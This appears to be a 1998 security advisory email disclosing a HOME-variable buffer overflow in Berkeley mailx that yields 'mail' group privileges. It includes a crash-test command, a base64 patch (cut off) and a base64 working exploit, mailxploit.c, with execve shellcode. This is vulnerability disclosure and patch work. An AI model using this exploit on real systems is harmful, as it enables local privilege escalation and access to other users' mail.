This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --1287857710-1215613336-898748369=:12634 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Hi there. I've discovered a rather serious security hole in mailx, the good old Berkeley mail program. It's somehow present at least in the last versions I've checked (mailx-8.1.1 in Linux, mailx 5.0 in Solaris). The bug is an exploitable buffer overflow (using the HOME environment variable) that allows any local user to acquire the privileges under which the program runs, usually group "mail" (on many of the modern versions I've seen, mailx is setgid "mail"). So the bug allows you to get "mail" group privileges, and this means that at least you can play with other people's mail. Although this wouldn't be very nice from you, this shouldn't be a big problem for the integrity of the system. But there could be a much more serious implication: being able to write in /var/spool/mail is usually an open door to the root account, for example by using races and such in mail delivery programs. You can check if your particular version of mailx is vulnerable through these steps: $ cp `which mailx` ./mailx $ HOME=3D`perl -e 'print "A"x10000'` ./mailx Segmentation fault (core dumped) $ gdb ./mailx core GNU gdb 4.17 [...] #0 0x41414141 in ?? () Here we go. By the way, although in Linux 2000 "A"s are enough, in Solaris you'll need more (10000 worked for me). I've verified that Debian GNU/Linux (package mailx-8.1.1-9 and previous) is vulnerable. Solaris 5.5.1 and 5.6 (mailx 5.0) also seem vulnerable after a couple of quick tests, but I haven't been able to check the return address due to lack of a root access to any Solaris, so I'm not 100% sure. Redhat Linux mailx has the bug, but as they don't install it setgid mail there's no direct danger. About the bug: it is in "fio.c", in the "xname" variable of the "expand" function: char xname[PATHSIZE]; [...] sprintf(xname, "%s%s", homedir, name + 1); Two attachments are included in this message: -A patch against mailx-8.1.1 that solves the problem. There are a lot of buffer overflows in the sources of mailx, although only the one I mention seems to be exploitable. The patch is dirty and simple: replace sprintf and strcpy by snprintf and strncpy almost everywhere. I haven't tested it a lot, use it at your own risk. -An exploit that should work under Linux (at least it does so in Debian). To test: compile it, execute it, and it should give you a shell; check with "id" if you are group "mail". By the way, the program assumes the gid for group mail is 8, as in Debian. Please, use it _JUST_ for testing and educative purposes ;) I reported the problem a few days ago to Debian, Redhat, Sun, and CERT, and I also sent them the patches. So the new versions should be on the way or even already released, at least for the Linux distributions. BTW, the person who tested the bug under Solaris (I don't have direct access to any Solaris machine) told me that he had a hard time: tcsh$ setenv HOME `perl -e 'print "A"x10000'` connection lost !!! Seems like tcsh doesn't like huge homes like this. Second try: tsch$ exec sh sh$ HOME=3D`perl -e 'print "A"x10000'` sh$ which mailx Segmentation Fault (core dumped) Erm... Seems like Sun is doing a great job with buffer overflows. This happened under 5.5.1. I wonder if these have any security implication. Anyway, they are not bad as a joke. Regards. -- Alvaro Mart=EDnez Echevarr=EDa LANDER SISTEMAS P=BA Castellana, 121 28046 Madrid, SPAIN --1287857710-1215613336-898748369=:12634 Content-Type: TEXT/x-csrc; name="mailxploit.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.980625061929.12634Bat_private> Content-Description: LyoNCiAqIG1haWx4cGxvaXQuYyAoTGludXgvaTM4NikNCiAqIFNhdCBKdW4g MjAgMDA6NDc6NTkgQ0VTVCAxOTk4DQogKiBBbHZhcm8gTWFydGluZXogRWNo ZXZhcnJpYSA8ZWxndXJ1QGxhbmRlci5lcz4NCiAqIEV4cGxvaXQgYSBidWZm ZXIgb3ZlcnJ1biBpbiBtYWlseCB1c2luZyB0aGUgZW52aXJvbm1lbnQgdmFy aWFibGUNCiAqICRIT01FLCB0byBhY3F1aXJlICJtYWlsIiBncm91cCBwcml2 aWxlZ2VzIChhc3N1bWluZyB0aGF0IG1haWx4DQogKiBpcyBpbnN0YWxsZWQg c2V0Z2lkIG1haWwpLg0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2lu Y2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1 ZGUgPHN0cmluZy5oPg0KDQovKg0KICogVGhlIGxvY2F0aW9uIG9mIG1haWx4 Lg0KICovDQojZGVmaW5lIE1BSUxYICAiL3Vzci9iaW4vbWFpbCINCi8qDQog KiBUaGUgZ2lkIGZvciBncm91cCBtYWlsIChyZXByZXNlbnRlZCBpbiBhIGNo YXIsIGluIGhleGFkZWNpbWFsKS4NCiAqLw0KI2RlZmluZSBHSUQgICAgIlx4 MDgiDQoNCiNkZWZpbmUgREVGQVVMVF9PRkZTRVQgICAgICAgICAgICAgICAg IDIwMDANCiNkZWZpbmUgREVGQVVMVF9CVUZGRVJfU0laRSAgICAgICAgICAg IDExMjQNCiNkZWZpbmUgTk9QICAgICAgICAgICAgICAgICAgICAgICAgICAg IDB4OTANCg0KY2hhciBzaGVsbGNvZGVbXSA9DQogIC8qIHNldGV1aWQoR0lE KTsgc2V0cmV1aWQoR0lELEdJRCk7ICovDQogICJceDMxXHhkYlx4MzFceGM5 XHhiYlx4ZmZceGZmXHhmZlx4ZmZceGIxIiBHSUQgIlx4MzFceGMwXHhiMFx4 NDdceGNkXHg4MCINCiAgIlx4MzFceGRiXHgzMVx4YzlceGIzIiBHSUQgIlx4 YjEiIEdJRCAiXHgzMVx4YzBceGIwXHg0N1x4Y2RceDgwIg0KICAvKiBnZW5l cmljIHNoZWxsIGNvZGUgYnkgQWxlcGggT25lICovDQogICJceGViXHgxZlx4 NWVceDg5XHg3Nlx4MDhceDMxXHhjMFx4ODhceDQ2XHgwN1x4ODlceDQ2XHgw Y1x4YjBceDBiIg0KICAiXHg4OVx4ZjNceDhkXHg0ZVx4MDhceDhkXHg1Nlx4 MGNceGNkXHg4MFx4MzFceGRiXHg4OVx4ZDhceDQwXHhjZCINCiAgIlx4ODBc eGU4XHhkY1x4ZmZceGZmXHhmZi9iaW4vc2giOw0KDQp1bnNpZ25lZCBsb25n DQpnZXRfc3Aodm9pZCkgew0KICAgX19hc21fXygibW92bCAlZXNwLCVlYXgi KTsNCn0NCg0KaW50DQptYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsN CiAgY2hhciAqYnVmZiwgKnB0cjsNCiAgbG9uZyAqYWRkcl9wdHIsIGFkZHI7 DQogIGludCBvZmZzZXQ9REVGQVVMVF9PRkZTRVQsIGJzaXplPURFRkFVTFRf QlVGRkVSX1NJWkU7DQogIGludCBpOw0KDQogIGFkZHIgPSBnZXRfc3AoKSAt IG9mZnNldDsNCiAgaWYgKChidWZmPShjaGFyICopbWFsbG9jKGJzaXplKSk9 PU5VTEwpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiZXJyb3IgaW4gbWFsbG9j KClcbiIpOw0KICAgIGV4aXQoMSk7DQogIH0NCg0KICBwdHIgPSBidWZmOw0K ICBhZGRyX3B0ciA9IChsb25nICopIHB0cjsNCiAgZm9yIChpID0gMDsgaSA8 IGJzaXplOyBpKz00KQ0KICAgICooYWRkcl9wdHIrKykgPSBhZGRyOw0KICBm b3IgKGkgPSAwOyBpIDwgYnNpemUvMjsgaSsrKQ0KICAgIGJ1ZmZbaV0gPSBO T1A7DQogIHB0ciA9IGJ1ZmYgKyAoKGJzaXplLzIpIC0gKHN0cmxlbihzaGVs bGNvZGUpLzIpKTsNCiAgZm9yIChpID0gMDsgaSA8IHN0cmxlbihzaGVsbGNv ZGUpOyBpKyspDQogICAgKihwdHIrKykgPSBzaGVsbGNvZGVbaV07DQogIGJ1 ZmZbYnNpemUgLSAxXSA9ICdcMCc7DQoNCiAgc2V0ZW52KCJIT01FIixidWZm LDEpOw0KICBleGVjbChNQUlMWCxNQUlMWCwiLW4iLCItZiIsIn4vcGF0YXRh IixOVUxMKTsNCg0KICBleGl0KDApOw0KDQp9DQoNCg== --1287857710-1215613336-898748369=:12634 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-mailx-8.1.1" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.980625061929.12634Cat_private> Content-Description: ZGlmZiAtcnUgbWFpbHgtOC4xLjEub3JpZy9hdXguYyBtYWlseC04LjEuMS9h dXguYw0KLS0tIG1haWx4LTguMS4xLm9yaWcvYXV4LmMJRnJpIEp1biAxNCAx MDoyNjo1NSAxOTk2DQorKysgbWFpbHgtOC4xLjEvYXV4LmMJU2F0IEp1biAy MCAwNDo0ODozNiAxOTk4DQpAQCAtMjgwLDE2ICsyODAsMjEgQEANCiAgKiBD b3B5IGEgc3RyaW5nLCBsb3dlcmNhc2luZyBpdCBhcyB3ZSBnby4NCiAgKi8N CiB2b2lkDQotaXN0cmNweShkZXN0LCBzcmMpDQoraXN0cmNweShkZXN0LCBz cmMsIHNpemUpDQogCXJlZ2lzdGVyIGNoYXIgKmRlc3QsICpzcmM7DQorCWlu dCBzaXplOw0KIHsNCisJcmVnaXN0ZXIgY2hhciAqbWF4Ow0KIA0KLQlkbyB7 DQotCQlpZiAoaXN1cHBlcigqc3JjKSkNCisJbWF4PWRlc3Qrc2l6ZS0xOw0K Kwl3aGlsZSAoZGVzdDw9bWF4ICYmICpzcmMhPSdcMCcpIHsNCisJCWlmIChp c3VwcGVyKCpzcmMpKSB7DQogCQkJKmRlc3QrKyA9IHRvbG93ZXIoKnNyYyk7 DQotCQllbHNlDQorCQl9IGVsc2Ugew0KIAkJCSpkZXN0KysgPSAqc3JjOw0K LQl9IHdoaWxlICgqc3JjKysgIT0gMCk7DQorCQl9DQorCQlzcmMrKzsNCisJ fQ0KIH0NCiANCiAvKg0KQEAgLTYwNiwxMCArNjExLDEzIEBADQogCQkJCWJy ZWFrOw0KIAkJCWNwKys7DQogCQkJaWYgKGZpcnN0KSB7DQotCQkJCXN0cmNw eShuYW1lYnVmLCBjcCk7DQorCQkJCXN0cm5jcHkobmFtZWJ1ZiwgY3AsIExJ TkVTSVpFKTsNCiAJCQkJZmlyc3QgPSAwOw0KLQkJCX0gZWxzZQ0KLQkJCQlz dHJjcHkocmluZGV4KG5hbWVidWYsICchJykrMSwgY3ApOw0KKwkJCX0gZWxz ZSB7DQorCQkJCWNwMj1yaW5kZXgobmFtZWJ1ZiwgJyEnKSsxOw0KKwkJCQlz dHJuY3B5KGNwMiwgY3AsIChuYW1lYnVmK0xJTkVTSVpFKS1jcDIpOw0KKwkJ CX0NCisJCQluYW1lYnVmW0xJTkVTSVpFLTJdPSdcMCc7DQogCQkJc3RyY2F0 KG5hbWVidWYsICIhIik7DQogCQkJZ290byBuZXduYW1lOw0KIAkJfQ0KQEAg LTY5MSw3ICs2OTksOCBAQA0KIAkgKiBMb3dlci1jYXNlIHRoZSBzdHJpbmcs IHNvIHRoYXQgIlN0YXR1cyIgYW5kICJzdGF0dXMiDQogCSAqIHdpbGwgaGFz aCB0byB0aGUgc2FtZSBwbGFjZS4NCiAJICovDQotCWlzdHJjcHkocmVhbGZs ZCwgZmllbGQpOw0KKwlpc3RyY3B5KHJlYWxmbGQsIGZpZWxkLCBCVUZTSVop Ow0KKwlyZWFsZmxkW0JVRlNJWi0xXT0nXDAnOw0KIAlpZiAoaWdub3JlWzFd LmlfY291bnQgPiAwKQ0KIAkJcmV0dXJuICghbWVtYmVyKHJlYWxmbGQsIGln bm9yZSArIDEpKTsNCiAJZWxzZQ0KZGlmZiAtcnUgbWFpbHgtOC4xLjEub3Jp Zy9jbWQxLmMgbWFpbHgtOC4xLjEvY21kMS5jDQotLS0gbWFpbHgtOC4xLjEu b3JpZy9jbWQxLmMJRnJpIEp1biAxNCAxMDoyNjo1NiAxOTk2DQorKysgbWFp bHgtOC4xLjEvY21kMS5jCVNhdCBKdW4gMjAgMDQ6MDc6MzkgMTk5OA0KQEAg LTQ2NSw3ICs0NjUsNyBAQA0KIAljaGFyIGRpcm5hbWVbQlVGU0laXTsNCiAJ Y2hhciAqY21kOw0KIA0KLQlpZiAoZ2V0Zm9sZChkaXJuYW1lKSA8IDApIHsN CisJaWYgKGdldGZvbGQoZGlybmFtZSwgQlVGU0laKSA8IDApIHsNCiAJCXBy aW50ZigiTm8gdmFsdWUgc2V0IGZvciBcImZvbGRlclwiXG4iKTsNCiAJCXJl dHVybiAxOw0KIAl9DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL2NtZDIu YyBtYWlseC04LjEuMS9jbWQyLmMNCi0tLSBtYWlseC04LjEuMS5vcmlnL2Nt ZDIuYwlGcmkgSnVuIDE0IDEwOjI2OjU2IDE5OTYNCisrKyBtYWlseC04LjEu MS9jbWQyLmMJU2F0IEp1biAyMCAwNDo0OTo1NCAxOTk4DQpAQCAtNDk2LDcg KzQ5Niw4IEBADQogCWlmICgqbGlzdCA9PSBOT1NUUikNCiAJCXJldHVybiBp Z3Nob3codGFiLCB3aGljaCk7DQogCWZvciAoYXAgPSBsaXN0OyAqYXAgIT0g MDsgYXArKykgew0KLQkJaXN0cmNweShmaWVsZCwgKmFwKTsNCisJCWlzdHJj cHkoZmllbGQsICphcCwgQlVGU0laKTsNCisJCWZpZWxkW0JVRlNJWi0xXT0n XDAnOw0KIAkJaWYgKG1lbWJlcihmaWVsZCwgdGFiKSkNCiAJCQljb250aW51 ZTsNCiAJCWggPSBoYXNoKGZpZWxkKTsNCmRpZmYgLXJ1IG1haWx4LTguMS4x Lm9yaWcvY21kMy5jIG1haWx4LTguMS4xL2NtZDMuYw0KLS0tIG1haWx4LTgu MS4xLm9yaWcvY21kMy5jCUZyaSBKdW4gMTQgMTA6MjY6NTcgMTk5Ng0KKysr IG1haWx4LTguMS4xL2NtZDMuYwlTYXQgSnVuIDIwIDA0OjQxOjM3IDE5OTgN CkBAIC02NSw4ICs2NSw5IEBADQogCWNoYXIgKnNoZWxsOw0KIAljaGFyIGNt ZFtCVUZTSVpdOw0KIA0KLQkodm9pZCkgc3RyY3B5KGNtZCwgc3RyKTsNCi0J aWYgKGJhbmdleHAoY21kKSA8IDApDQorCSh2b2lkKSBzdHJuY3B5KGNtZCwg c3RyLCBCVUZTSVopOw0KKwljbWRbQlVGU0laLTFdPSdcMCc7DQorCWlmIChi YW5nZXhwKGNtZCwgQlVGU0laKSA8IDApDQogCQlyZXR1cm4gMTsNCiAJaWYg KChzaGVsbCA9IHZhbHVlKCJTSEVMTCIpKSA9PSBOT1NUUikNCiAJCXNoZWxs ID0gX1BBVEhfQ1NIRUxMOw0KQEAgLTEwMyw4ICsxMDQsOSBAQA0KIGNoYXIJ bGFzdGJhbmdbMTI4XTsNCiANCiBpbnQNCi1iYW5nZXhwKHN0cikNCitiYW5n ZXhwKHN0ciwgc2l6ZSkNCiAJY2hhciAqc3RyOw0KKwlpbnQgc2l6ZTsNCiB7 DQogCWNoYXIgYmFuZ2J1ZltCVUZTSVpdOw0KIAlyZWdpc3RlciBjaGFyICpj cCwgKmNwMjsNCkBAIC0xNDQsNyArMTQ2LDggQEANCiAJCXByaW50ZigiISVz XG4iLCBiYW5nYnVmKTsNCiAJCWZmbHVzaChzdGRvdXQpOw0KIAl9DQotCXN0 cmNweShzdHIsIGJhbmdidWYpOw0KKwlzdHJuY3B5KHN0ciwgYmFuZ2J1Ziwg c2l6ZSk7DQorCXN0cltzaXplLTFdPSdcMCc7DQogCXN0cm5jcHkobGFzdGJh bmcsIGJhbmdidWYsIDEyOCk7DQogCWxhc3RiYW5nWzEyN10gPSAwOw0KIAly ZXR1cm4oMCk7DQpkaWZmIC1ydSBtYWlseC04LjEuMS5vcmlnL2NvbGxlY3Qu YyBtYWlseC04LjEuMS9jb2xsZWN0LmMNCi0tLSBtYWlseC04LjEuMS5vcmln L2NvbGxlY3QuYwlGcmkgSnVuIDE0IDEwOjI2OjU4IDE5OTYNCisrKyBtYWls eC04LjEuMS9jb2xsZWN0LmMJU2F0IEp1biAyMCAwNDo1Mjo0MCAxOTk4DQpA QCAtMjY4LDcgKzI2OCw4IEBADQogCQkJaHAtPmhfYmNjID0gY2F0KGhwLT5o X2JjYywgZXh0cmFjdCgmbGluZWJ1ZlsyXSwgR0JDQykpOw0KIAkJCWJyZWFr Ow0KIAkJY2FzZSAnZCc6DQotCQkJc3RyY3B5KGxpbmVidWYgKyAyLCBnZXRk ZWFkbGV0dGVyKCkpOw0KKwkJCXN0cm5jcHkobGluZWJ1ZiArIDIsIGdldGRl YWRsZXR0ZXIoKSwgTElORVNJWkUgLSAyKTsNCisJCQlsaW5lYnVmW0xJTkVT SVpFLTFdPSdcMCc7DQogCQkJLyogZmFsbCBpbnRvIC4gLiAuICovDQogCQlj YXNlICdyJzoNCiAJCWNhc2UgJzwnOg0KT25seSBpbiBtYWlseC04LjEuMTog Y29sbGVjdC5jLm9yaWcNCmRpZmYgLXJ1IG1haWx4LTguMS4xLm9yaWcvZXh0 ZXJuLmggbWFpbHgtOC4xLjEvZXh0ZXJuLmgNCi0tLSBtYWlseC04LjEuMS5v cmlnL2V4dGVybi5oCUZyaSBKdW4gMTQgMTA6MjY6NTkgMTk5Ng0KKysrIG1h aWx4LTguMS4xL2V4dGVybi5oCVNhdCBKdW4gMjAgMDQ6NTI6NDAgMTk5OA0K QEAgLTk0LDcgKzk0LDcgQEANCiBpbnQJIGFwcGVuZCBfX1AoKHN0cnVjdCBt ZXNzYWdlICosIEZJTEUgKikpOw0KIGludAkgYXJnY291bnQgX19QKChjaGFy ICoqKSk7DQogdm9pZAkgYXNzaWduIF9fUCgoY2hhciBbXSwgY2hhciBbXSkp Ow0KLWludAkgYmFuZ2V4cCBfX1AoKGNoYXIgKikpOw0KK2ludAkgYmFuZ2V4 cCBfX1AoKGNoYXIgKiwgaW50KSk7DQogaW50CSBibGFua2xpbmUgX19QKChj aGFyIFtdKSk7DQogdm9pZAkgYnJva3BpcGUgX19QKChpbnQpKTsNCiBpbnQJ IGNoYXJjb3VudCBfX1AoKGNoYXIgKiwgaW50KSk7DQpAQCAtMTMwLDcgKzEz MCw3IEBADQogaW50CSBmaWxlIF9fUCgodm9pZCAqKSk7DQogc3RydWN0IGdy b3VwaGVhZCAqDQogCSBmaW5kZ3JvdXAgX19QKChjaGFyIFtdKSk7DQotdm9p ZAkgZmluZG1haWwgX19QKChjaGFyICosIGNoYXIgKikpOw0KK3ZvaWQJIGZp bmRtYWlsIF9fUCgoY2hhciAqLCBjaGFyICosIGludCkpOw0KIGludAkgZmly c3QgX19QKChpbnQsIGludCkpOw0KIHZvaWQJIGZpeGhlYWQgX19QKChzdHJ1 Y3QgaGVhZGVyICosIHN0cnVjdCBuYW1lICopKTsNCiB2b2lkCSBmbXQgX19Q KChjaGFyICosIHN0cnVjdCBuYW1lICosIEZJTEUgKiwgaW50KSk7DQpAQCAt MTM5LDcgKzEzOSw3IEBADQogdm9pZAkgZnJlZV9jaGlsZCBfX1AoKGludCkp Ow0KIGludAkgZnJvbSBfX1AoKHZvaWQgKikpOw0KIG9mZl90CSBmc2l6ZSBf X1AoKEZJTEUgKikpOw0KLWludAkgZ2V0Zm9sZCBfX1AoKGNoYXIgKikpOw0K K2ludAkgZ2V0Zm9sZCBfX1AoKGNoYXIgKiwgaW50KSk7DQogaW50CSBnZXRo ZmllbGQgX19QKChGSUxFICosIGNoYXIgW10sIGludCwgY2hhciAqKikpOw0K IGludAkgZ2V0bXNnbGlzdCBfX1AoKGNoYXIgKiwgaW50ICosIGludCkpOw0K IGludAkgZ2V0cmF3bGlzdCBfX1AoKGNoYXIgW10sIGNoYXIgKiosIGludCkp Ow0KQEAgLTE2NCw3ICsxNjQsNyBAQA0KIGludAkgaXNoZWFkIF9fUCgoY2hh ciBbXSkpOw0KIGludAkgaXNpZ24gX19QKChjaGFyICosIHN0cnVjdCBpZ25v cmV0YWIgW10pKTsNCiBpbnQJIGlzcHJlZml4IF9fUCgoY2hhciAqLCBjaGFy ICopKTsNCi12b2lkCSBpc3RyY3B5IF9fUCgoY2hhciAqLCBjaGFyICopKTsN Cit2b2lkCSBpc3RyY3B5IF9fUCgoY2hhciAqLCBjaGFyICosIGludCkpOw0K IGNvbnN0IHN0cnVjdCBjbWQgKg0KIAkgbGV4IF9fUCgoY2hhciBbXSkpOw0K IHZvaWQJIGxvYWQgX19QKChjaGFyICopKTsNCmRpZmYgLXJ1IG1haWx4LTgu MS4xLm9yaWcvZmlvLmMgbWFpbHgtOC4xLjEvZmlvLmMNCi0tLSBtYWlseC04 LjEuMS5vcmlnL2Zpby5jCUZyaSBKdW4gMTQgMTA6Mjc6MDAgMTk5Ng0KKysr IG1haWx4LTguMS4xL2Zpby5jCVNhdCBKdW4gMjAgMDQ6NTI6NDAgMTk5OA0K QEAgLTc0LDcgKzc0LDcgQEANCiAJY2hhciBsaW5lYnVmW0xJTkVTSVpFXTsN CiANCiAJLyogR2V0IHRlbXBvcmFyeSBmaWxlLiAqLw0KLQkodm9pZClzcHJp bnRmKGxpbmVidWYsICIlcy9tYWlsLlhYWFhYWCIsIHRtcGRpcik7DQorCSh2 b2lkKXNucHJpbnRmKGxpbmVidWYsTElORVNJWkUsIiVzL21haWwuWFhYWFhY IiwgdG1wZGlyKTsNCiAJaWYgKChjID0gbWtzdGVtcChsaW5lYnVmKSkgPT0g LTEgfHwNCiAJICAgIChtZXN0bXAgPSBGZG9wZW4oYywgInIrIikpID09IE5V TEwpIHsNCiAJCSh2b2lkKWZwcmludGYoc3RkZXJyLCAibWFpbDogY2FuJ3Qg b3BlbiAlc1xuIiwgbGluZWJ1Zik7DQpAQCAtMzM2LDcgKzMzNiw3IEBADQog CSAqLw0KIAlzd2l0Y2ggKCpuYW1lKSB7DQogCWNhc2UgJyUnOg0KLQkJZmlu ZG1haWwobmFtZVsxXSA/IG5hbWUgKyAxIDogbXluYW1lLCB4bmFtZSk7DQor CQlmaW5kbWFpbChuYW1lWzFdID8gbmFtZSArIDEgOiBteW5hbWUsIHhuYW1l LCBQQVRIU0laRSk7DQogCQlyZXR1cm4gc2F2ZXN0cih4bmFtZSk7DQogCWNh c2UgJyMnOg0KIAkJaWYgKG5hbWVbMV0gIT0gMCkNCkBAIC0zNTEsMTMgKzM1 MSwxMyBAQA0KIAkJCW5hbWUgPSAifi9tYm94IjsNCiAJCS8qIGZhbGwgdGhy b3VnaCAqLw0KIAl9DQotCWlmIChuYW1lWzBdID09ICcrJyAmJiBnZXRmb2xk KGNtZGJ1ZikgPj0gMCkgew0KLQkJc3ByaW50Zih4bmFtZSwgIiVzLyVzIiwg Y21kYnVmLCBuYW1lICsgMSk7DQorCWlmIChuYW1lWzBdID09ICcrJyAmJiBn ZXRmb2xkKGNtZGJ1ZiwgUEFUSFNJWkUpID49IDApIHsNCisJCXNucHJpbnRm KHhuYW1lLCBQQVRIU0laRSwgIiVzLyVzIiwgY21kYnVmLCBuYW1lICsgMSk7 DQogCQluYW1lID0gc2F2ZXN0cih4bmFtZSk7DQogCX0NCiAJLyogY2F0Y2gg dGhlIG1vc3QgY29tbW9uIHNoZWxsIG1ldGEgY2hhcmFjdGVyICovDQogCWlm IChuYW1lWzBdID09ICd+JyAmJiAobmFtZVsxXSA9PSAnLycgfHwgbmFtZVsx XSA9PSAnXDAnKSkgew0KLQkJc3ByaW50Zih4bmFtZSwgIiVzJXMiLCBob21l ZGlyLCBuYW1lICsgMSk7DQorCQlzbnByaW50Zih4bmFtZSwgUEFUSFNJWkUs ICIlcyVzIiwgaG9tZWRpciwgbmFtZSArIDEpOw0KIAkJbmFtZSA9IHNhdmVz dHIoeG5hbWUpOw0KIAl9DQogCWlmICghYW55b2YobmFtZSwgIn57Wyo/JGAn XCJcXCIpKQ0KQEAgLTM2Niw3ICszNjYsNyBAQA0KIAkJcGVycm9yKCJwaXBl Iik7DQogCQlyZXR1cm4gbmFtZTsNCiAJfQ0KLQlzcHJpbnRmKGNtZGJ1Ziwg ImVjaG8gJXMiLCBuYW1lKTsNCisJc25wcmludGYoY21kYnVmLCBQQVRIU0la RSwgImVjaG8gJXMiLCBuYW1lKTsNCiAJaWYgKChzaGVsbCA9IHZhbHVlKCJT SEVMTCIpKSA9PSBOT1NUUikNCiAJCXNoZWxsID0gX1BBVEhfQ1NIRUxMOw0K IAlwaWQgPSBzdGFydF9jb21tYW5kKHNoZWxsLCAwLCAtMSwgcGl2ZWNbMV0s ICItYyIsIGNtZGJ1ZiwgTk9TVFIpOw0KQEAgLTQwOSwxNyArNDA5LDIwIEBA DQogICogRGV0ZXJtaW5lIHRoZSBjdXJyZW50IGZvbGRlciBkaXJlY3Rvcnkg bmFtZS4NCiAgKi8NCiBpbnQNCi1nZXRmb2xkKG5hbWUpDQorZ2V0Zm9sZChu YW1lLCBzaXplKQ0KIAljaGFyICpuYW1lOw0KKwlpbnQgc2l6ZTsNCiB7DQog CWNoYXIgKmZvbGRlcjsNCiANCiAJaWYgKChmb2xkZXIgPSB2YWx1ZSgiZm9s ZGVyIikpID09IE5PU1RSKQ0KIAkJcmV0dXJuICgtMSk7DQotCWlmICgqZm9s ZGVyID09ICcvJykNCi0JCXN0cmNweShuYW1lLCBmb2xkZXIpOw0KLQllbHNl DQotCQlzcHJpbnRmKG5hbWUsICIlcy8lcyIsIGhvbWVkaXIsIGZvbGRlcik7 DQorCWlmICgqZm9sZGVyID09ICcvJykgew0KKwkJc3RybmNweShuYW1lLCBm b2xkZXIsIHNpemUpOw0KKwkJbmFtZVtzaXplXT0nXDAnOw0KKwl9IGVsc2Ug ew0KKwkJc25wcmludGYobmFtZSwgc2l6ZSwgIiVzLyVzIiwgaG9tZWRpciwg Zm9sZGVyKTsNCisJfQ0KIAlyZXR1cm4gKDApOw0KIH0NCiANCkBAIC00MzYs NyArNDM5LDcgQEANCiAJZWxzZSBpZiAoKmNwICE9ICcvJykgew0KIAkJY2hh ciBidWZbUEFUSFNJWkVdOw0KIA0KLQkJKHZvaWQpIHNwcmludGYoYnVmLCAi fi8lcyIsIGNwKTsNCisJCSh2b2lkKSBzbnByaW50ZihidWYsIFBBVEhTSVpF LCAifi8lcyIsIGNwKTsNCiAJCWNwID0gZXhwYW5kKGJ1Zik7DQogCX0NCiAJ cmV0dXJuIGNwOw0KZGlmZiAtcnUgbWFpbHgtOC4xLjEub3JpZy9sZXguYyBt YWlseC04LjEuMS9sZXguYw0KLS0tIG1haWx4LTguMS4xLm9yaWcvbGV4LmMJ RnJpIEp1biAxNCAxMDoyNzowMyAxOTk2DQorKysgbWFpbHgtOC4xLjEvbGV4 LmMJU2F0IEp1biAyMCAwNDo1Mjo0MCAxOTk4DQpAQCAtMTM0LDkgKzEzNCwx MiBAQA0KIAl9DQogCXNodWRjbG9iID0gMTsNCiAJZWRpdCA9IGlzZWRpdDsN Ci0Jc3RyY3B5KHByZXZmaWxlLCBtYWlsbmFtZSk7DQotCWlmIChuYW1lICE9 IG1haWxuYW1lKQ0KLQkJc3RyY3B5KG1haWxuYW1lLCBuYW1lKTsNCisJc3Ry bmNweShwcmV2ZmlsZSwgbWFpbG5hbWUsIFBBVEhTSVpFKTsNCisJcHJldmZp bGVbUEFUSFNJWkUtMV09J1wwJzsNCisJaWYgKG5hbWUgIT0gbWFpbG5hbWUp IHsNCisJCXN0cm5jcHkobWFpbG5hbWUsIG5hbWUsIFBBVEhTSVpFKTsNCisJ CW1haWxuYW1lW1BBVEhTSVpFLTFdPSdcMCc7DQorCX0NCiAJbWFpbHNpemUg PSBmc2l6ZShpYnVmKTsNCiAJaWYgKChvdGYgPSBmb3Blbih0ZW1wTWVzZywg InciKSkgPT0gTlVMTCkgew0KIAkJcGVycm9yKHRlbXBNZXNnKTsNCkBAIC02 MTYsMTAgKzYxOSwxMCBAQA0KIAkJCXMrKzsNCiAJfQ0KIAllbmFtZSA9IG1h aWxuYW1lOw0KLQlpZiAoZ2V0Zm9sZChmbmFtZSkgPj0gMCkgew0KKwlpZiAo Z2V0Zm9sZChmbmFtZSwgQlVGU0laLTEpID49IDApIHsNCiAJCXN0cmNhdChm bmFtZSwgIi8iKTsNCiAJCWlmIChzdHJuY21wKGZuYW1lLCBtYWlsbmFtZSwg c3RybGVuKGZuYW1lKSkgPT0gMCkgew0KLQkJCXNwcmludGYoem5hbWUsICIr JXMiLCBtYWlsbmFtZSArIHN0cmxlbihmbmFtZSkpOw0KKwkJCXNucHJpbnRm KHpuYW1lLCBCVUZTSVosICIrJXMiLCBtYWlsbmFtZSArIHN0cmxlbihmbmFt ZSkpOw0KIAkJCWVuYW1lID0gem5hbWU7DQogCQl9DQogCX0NCk9ubHkgaW4g bWFpbHgtOC4xLjE6IGxleC5jLm9yaWcNCmRpZmYgLXJ1IG1haWx4LTguMS4x Lm9yaWcvbGlzdC5jIG1haWx4LTguMS4xL2xpc3QuYw0KLS0tIG1haWx4LTgu MS4xLm9yaWcvbGlzdC5jCUZyaSBKdW4gMTQgMTA6Mjc6MDMgMTk5Ng0KKysr IG1haWx4LTguMS4xL2xpc3QuYwlTYXQgSnVuIDIwIDA0OjM0OjQwIDE5OTgN CkBAIC01MTUsNyArNTE1LDggQEANCiAJaW50IHF1b3RlYzsNCiANCiAJaWYg KHJlZ3JldHAgPj0gMCkgew0KLQkJc3RyY3B5KGxleHN0cmluZywgc3RyaW5n X3N0YWNrW3JlZ3JldHBdKTsNCisJCXN0cm5jcHkobGV4c3RyaW5nLCBzdHJp bmdfc3RhY2tbcmVncmV0cF0sIFNUUklOR0xFTik7DQorCQlsZXhzdHJpbmdb U1RSSU5HTEVOLTFdPSdcMCc7DQogCQlsZXhudW1iZXIgPSBudW1iZXJzdGFj a1tyZWdyZXRwXTsNCiAJCXJldHVybihyZWdyZXRzdGFja1tyZWdyZXRwLS1d KTsNCiAJfQ0KQEAgLTY5NSwxMCArNjk2LDEyIEBADQogCXJlZ2lzdGVyIGNo YXIgKmNwLCAqY3AyLCAqYmFja3VwOw0KIA0KIAlzdHIrKzsNCi0JaWYgKHN0 cmxlbihzdHIpID09IDApDQorCWlmIChzdHJsZW4oc3RyKSA9PSAwKSB7DQog 